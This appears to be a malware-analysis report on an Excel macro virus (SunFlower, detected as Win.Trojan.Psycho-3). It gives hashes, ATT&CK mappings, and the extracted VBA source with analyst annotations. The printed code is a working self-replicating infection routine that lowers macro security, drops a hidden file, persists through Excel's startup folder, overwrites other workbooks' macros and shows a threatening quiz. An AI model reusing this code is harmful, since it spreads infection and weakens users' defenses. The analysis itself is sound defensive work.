Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 0f1a3c080e90536b…

MALICIOUS

Office (OLE)

32.5 KB Created: 2000-09-23 01:55:49 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f0b149c44900020c7d82c1582aa236cc SHA-1: f14ddea8ec58796cfc01656ac9e83a7296a94717 SHA-256: 0f1a3c080e90536bad3f4dc00001d10b9bff6757754f2074d22419b8b91febb9
188 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1137 Office Application Startup (a copy is saved to `Application.StartupPath`, the Excel XLSTART folder — not the Windows Run keys / Startup folder that T1547.001 describes) · T1562.001 Disable or Modify Tools (Office macro security level lowered through an HKCU registry write; the Macro > Security... menu item is disabled) · T1564.001 Hidden Files and Directories (`C:\Windows\xedit.drv` is set hidden+system). T1105 Ingress Tool Transfer is not supported by the extracted macro: `xedit.drv` is written from the document's own VBA code module, and nothing is fetched from the network.

The sample is the `ThisWorkbook` module of the SunFlower Excel macro virus (the source credits itself to "Yello & WalruS", Sept 2000). Its `Workbook_Deactivate` handler silences Excel's alerts and screen updates, lowers the Office 2000 (`Office\9.0`) macro security level through an HKCU registry write, and writes its own module source (lines 1–110) to `C:\Windows\xedit.drv` with hidden+system attributes. That file is not a downloaded second stage: it is the infection source, imported via `VBProject...AddFromFile` into any active workbook whose `ThisWorkbook` module lacks the `' MarshYello` marker on line 3. Persistence comes from saving a copy as `Book1.` (trailing dot, no extension) in `Application.StartupPath`, so Excel reloads it at every start. About one activation in sixty (`Second(Now) > 58`) calls `PayloadOne`, which shows an intimidation dialog claiming Windows files were hidden and forces the user through a three-question quiz; no code in the visible listing actually hides, deletes or restores files. The `OLE_VBA_CREATEOBJ` heuristic fires, but no `CreateObject` call appears in the portion of the macro shown here (the listing is truncated inside `KickOut`). Note that on current Office versions the code-module access used for infection is blocked unless "Trust access to the VBA project object model" is enabled. ClamAV matches both the container (`Win.Trojan.Psycho-3`) and the extracted macro (`Win.Trojan.SunFlower-1`).

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6044 bytes
SHA-256: c587b4a903c0e16ae0e8b0b5d328a76e8a3f6fe9d2943dcb879343081f062c22
Detection
ClamAV: Win.Trojan.SunFlower-1
Obfuscation or payload: unlikely — only trivial expression obfuscation (`(5 * 2 - 10)` standing in for `False`); no encoded strings, embedded binaries or network activity in the extracted source.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) ' Win32 ExitWindowsEx import (module line 1)
Private Const EWX_REBOOT = 2 ' Win32 EWX_REBOOT flag value for ExitWindowsEx (module line 2)
' MarshYello
' ^ Module line 3 is the infection marker. Workbook_Deactivate compares line 3 of the
'   active workbook's ThisWorkbook module against "' MarshYello" to decide whether it is
'   already infected, and dumps module lines 1-110 to C:\Windows\xedit.drv as the
'   infection source, so the line layout above this comment is load-bearing. Analyst
'   notes were deliberately added below the marker, not above it.
' The VB_* Attribute lines are export metadata (normally stripped on import, so they are
'   not counted as module lines). ExitWindowsEx / EWX_REBOOT are declared for the reboot
'   that PayloadOne threatens; the KickOut body that presumably uses them is truncated
'   in this listing, so that use is not confirmed here.
Private Sub Workbook_Deactivate()
' SunFlower virus By Yello & WalruS (Sept 2000)
' Analyst notes: the infection routine. It is bound to the Workbook_Deactivate event, so
' it runs every time this workbook loses focus to another workbook, making whatever
' workbook becomes active the next target. Sequence: silence Excel's UI, impair macro
' security, drop this module's source to disk, install a copy in the Excel startup
' folder, overwrite the active workbook's ThisWorkbook module with that source, and on
' roughly one activation in sixty call PayloadOne. All errors are swallowed.

    On Error Resume Next   ' any failing step (no VBProject access, locked file, ...) is silently skipped
    
    With Application
        .DisplayAlerts = (5 * 2 - 10)   ' evaluates to 0 = False; the arithmetic is trivial obfuscation
        .Application.ScreenUpdating = (5 * 2 - 10)
        .Application.DisplayStatusBar = (5 * 2 - 10)
    End With

    ' Impair defenses: grey out the Macro > Security... menu entry and set the Office 2000
    ' (9.0) macro security level to 1 (Low) under HKCU. The key path is Word's, not
    ' Excel's, and PrivateProfileString with an empty filename is the Word object-model
    ' idiom for registry writes — whether it succeeds from Excel is not established here;
    ' if it fails, On Error Resume Next hides that.
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

    ' Drop the infection source: lines 1-110 of this project's first VBComponent (presumably
    ' this ThisWorkbook module) are written to C:\Windows\xedit.drv, then the file is marked
    ' hidden+system (attribute 6 = vbHidden 2 + vbSystem 4). Nothing is downloaded; the
    ' file is the document's own macro code.
    Open "C:\Windows\xedit.drv" For Output As #1
    Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 110)
    Close #1
    SetAttr ("C:\Windows\xedit.drv"), 6

    ' Code-module handles; both require access to the VBA project object model.
    Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule   ' assigned but not referenced again in this Sub

    ' Persistence: if no "Book1." (trailing dot, no extension) exists in Application.StartupPath
    ' (the XLSTART folder), save a copy there so Excel re-opens it, and re-arms this handler,
    ' on every launch. AddToMru:=False keeps it out of the recent-files list.
    CheckExist = Dir(Application.StartupPath & "\Book1.")
    If CheckExist = "" Then
    VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
    End If

    ' Infect the active workbook: if line 3 of its ThisWorkbook module is not the
    ' "' MarshYello" marker, wipe the module, import xedit.drv in its place, and save.
    If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
        ActiveWB.DeleteLines 1, ActiveWB.CountofLines
        ActiveWB.AddFromFile ("C:\Windows\xedit.drv")
        ActiveWorkbook.Save
    End If
    ' Payload trigger: Second(Now) ranges 0-59, so this fires only at second 59 (~1/60 of activations).
    If Second(Now) > 58 Then Call PayloadOne
End Sub

Private Sub PayloadOne()
' Analyst notes: the intimidation payload. Shows an Office Assistant balloon and a MsgBox
' claiming that Windows files have been hidden and that a reboot will damage the PC, then
' forces the user through three InputBox loops that only exit on the expected answer
' (Cancel or an empty answer simply re-prompts, since the loop condition is the answer
' text). Nothing in this Sub hides, restores or damages files; the threat is bluff as far
' as the visible code goes. After three wrong answers to question 3 it calls KickOut,
' whose body is truncated in this listing.
Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlertWarning
            .Text = "SunFlower Virus"
            .Heading = "Yello & WalruS Have You!"
            .Show
        End With
    ' Chr(13) is used as a line separator; Application.UserName personalises the message.
    MsgBox "Hello there " + Application.UserName + Chr(13) + Chr(13) + "Yello & WalruS have control of you P.C." + Chr(13) + Chr(13) + "We have temporally hidden some of your important windows files." + Chr(13) + Chr(13) + "Re-boot now and your P.C will never be the same" + Chr(13) + Chr(13) + "Do yourself a favour and answer our questions" + Chr(13) + Chr(13) + "Get them right and your files will be restored" + Chr(13) + Chr(13) + "Get them wrong and its godnight vienna", vbCritical, "SunFlower Virus"
        question1 = "Divide 30 by 1/2 and add 10. What is the answer ?"
        question2 = "Name one of the authors of this virus ?"
        question3 = "What does the 'V' stand for in DVD ?"
    ' Question 1: loops until the exact string "70" (30 / 0.5 + 10). Count is incremented
    ' but never consulted here, so there is no attempt limit.
    Count = 1
    Do
    Q1 = InputBox("O.k, Question 1" + Chr(13) + Chr(13) + question1, "SunFlower Virus")
    Count = Count + 1
    Loop Until Q1 = "70"
    ' Question 2: accepts only the listed spellings (case-sensitive, exact match); a hint
    ' is shown once Count reaches 5, i.e. after four wrong answers.
    Count = 1
    Do
    Q2 = InputBox("O.k, Question 2 a bit harder this time" + Chr(13) + Chr(13) + question2, "SunFlower Virus")
    Count = Count + 1
    If Count = 5 Then MsgBox "Hint: One's a colour!", vbInformation, "I Am The ........."
    Loop Until Q2 = "Walrus" Or Q2 = "walrus" Or Q2 = "Yello" Or Q2 = "yello" Or Q2 = "Yellow" Or Q2 = "yellow"
    ' Question 3: "Last Chance" on the third prompt, KickOut on the fourth (after three
    ' wrong answers). If KickOut returns, the loop keeps prompting until "Versatile".
    Count = 1
    Do
    If Count = 3 Then MsgBox "Last Chance", vbInformation, "SunFlower Virus"
    If Count = 4 Then Call KickOut
    Q3 = InputBox("O.k, Question 3, Get this correct and your home and dry " + Chr(13) + Chr(13) + question3, "SunFlower Virus")
    Count = Count + 1
    Loop Until Q3 = "Versatile" Or Q3 = "versatile"
    ' "Success" path: another balloon and an Assistant animation; no file restoration happens.
    Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Well done. Be Alert...."
            .Heading = "Yello & WalruS have left the building" + Chr(13) + "  Or have they ?"
            .Show
        End With
    Assistant.Animation = msoAnimationGetTechy
End Sub

Private Sub KickOut()
    Dim i As Integer
    On Error Resume Next
    MsgBox "Is it " & Time & " Already ?" + Chr(13) + Chr(13) + "Ive got to go", vbCritical, "Brain D
... (truncated)